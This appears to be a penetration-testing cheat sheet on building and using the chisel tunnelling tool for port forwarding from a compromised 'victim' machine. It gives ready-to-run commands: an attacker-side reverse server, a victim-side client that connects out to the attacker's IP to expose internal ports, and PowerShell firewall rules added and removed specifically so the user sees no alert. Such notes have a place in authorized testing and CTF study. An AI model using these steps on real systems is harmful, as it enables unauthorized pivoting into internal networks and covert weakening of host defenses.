Chisel Port Forwarding

sudo apt install golang

git clone https://github.com/jpillora/chisel.git

cd chisel/

Compile Chisel for Linux:

go build

Compile Chisel for Windows:

env GOOS=windows GOARCH=amd64 go build -o chisel.exe -ldflags "-s -w"

- Look internal open ports:

• Linux

ss -tln

ss -tl

ss -nltp

netstat -nat

• Windows

netstat -oat

netstat -ano

netstat -aton

- Local Port Forwarding

Attacker:

Download corresponding chisel to victim machine (windows or linux) https://github.com/jpillora/chisel/releases then transfer to victim machine

chisel server --reverse --port 9999

• Victim:

chisel client {My IP}:9999 R:{Found internal open port}:127.0.0.1:{Port in which we want to forward the port from victim machine}

Example:

.\chisel.exe client {My IP}:9999 R:8000:127.0.0.1:8000

Here we are forwarding the victim 8000 port to our 8000 port

- Reverse Port Forwarding

If we are against a Windows target, when the Windows firewall is enabled, it will prompt the user with an alert when an application attempts to listen on a port that is not explicitly allowed. Allowing access requires local admin privileges and clicking cancel will create an explicit block rule, so we must create an allow rule before running a reverse port forward using either netsh or New-NetFirewallRule, as adding and removing rules does not create a visible alert.

powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

Then to delete that rule:

powershell Remove-NetFirewallRule -DisplayName "8080-In"